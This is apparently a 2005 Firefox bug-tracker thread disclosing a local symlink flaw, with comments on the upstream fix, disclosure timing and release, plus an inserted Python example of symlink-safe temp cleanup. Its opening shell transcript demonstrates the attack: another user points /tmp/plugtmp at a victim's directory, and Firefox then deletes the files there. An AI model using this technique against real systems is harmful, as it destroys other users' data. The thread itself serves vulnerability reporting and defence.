I reported this upstream, #281284, but no response yet.

$ pwd
/home/taviso
$ mkdir test
$ cd test
$ for ((i=0;i<10;i++)); do touch ${RANDOM}.jpg; done
$ ls
10659.jpg  16835.jpg  26339.jpg  4062.jpg  8234.jpg
15120.jpg  22838.jpg  29316.jpg  724.jpg   9053.jpg

# now malicious user wants to remove these files (i'll use user nobody for this example)
$ sudo -u nobody ln -s /home/taviso/test /tmp/plugtmp
$ ls -l /tmp/plugtmp
lrwxrwxrwx 1 nobody nobody 17 Feb 6 18:43 /tmp/plugtmp -> /home/taviso/test/

# now malicious user waits until I run firefox...
$ firefox
<exit firefox>
$ ls
$ echo 'arghhh, my files!'
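A defensive counterpart to the report above, as an added example that is not part of the original report and not Firefox's actual fix: a cleanup routine that refuses to act on a symlink planted at a predictable temp path. The names `safe_cleanup` and `demo` are hypothetical, and the directories are constructed under a throwaway root rather than the real /tmp.

```python
import os
import stat
import tempfile


def safe_cleanup(path):
    """Delete the regular files directly inside scratch directory `path`.

    Returns the number removed, or None when `path` is refused: a symlink,
    not a directory, not owned by us, or writable by group/other.
    """
    try:
        # O_NOFOLLOW makes open() fail if the final component is a symlink.
        dfd = os.open(path, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    except OSError:
        return None
    try:
        st = os.fstat(dfd)  # checks the directory we actually opened
        if st.st_uid != os.geteuid() or st.st_mode & 0o022:
            return None
        removed = 0
        for name in os.listdir(dfd):
            info = os.stat(name, dir_fd=dfd, follow_symlinks=False)
            if stat.S_ISREG(info.st_mode):
                os.unlink(name, dir_fd=dfd)  # relative to dfd, not to a path
                removed += 1
        return removed
    finally:
        os.close(dfd)


def demo():
    """Constructed scenario: victim files, a planted link, a private scratch dir."""
    with tempfile.TemporaryDirectory() as root:
        victim = os.path.join(root, "victim")
        os.mkdir(victim, 0o700)
        for i in range(10):
            open(os.path.join(victim, f"{i}.jpg"), "w").close()
        planted = os.path.join(root, "plugtmp")  # stands in for /tmp/plugtmp
        os.symlink(victim, planted)
        refused = safe_cleanup(planted)
        survivors = len(os.listdir(victim))
        # mkdtemp gives an unpredictable name and mode 0700
        scratch = tempfile.mkdtemp(prefix="plugtmp-", dir=root)
        open(os.path.join(scratch, "a.tmp"), "w").close()
        return refused, survivors, safe_cleanup(scratch)


if __name__ == "__main__":
    print(demo())
```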
Fixed in upstream CVS (all branches).
Good catch Taviso. Upstream bug is still restricted.
Looks like a new point release is coming next week :)

------- Additional Comment #17 From Tavis Ormandy 2005-02-12 01:11 PST [reply] -------

can this bug be unrestricted now that it's RESOLVED?

------- Additional Comment #18 From Daniel Veditz 2005-02-12 03:01 PST [reply] -------

We'd prefer to wait until we get the 1.0.1 release into people's hands (which should be next week), but as the bug reporter you can disclose at any time if you think we're being too slow about it.
Now public, fixed in FF 1.0.1
Replaced by metabug 83267

*** This bug has been marked as a duplicate of 83267 ***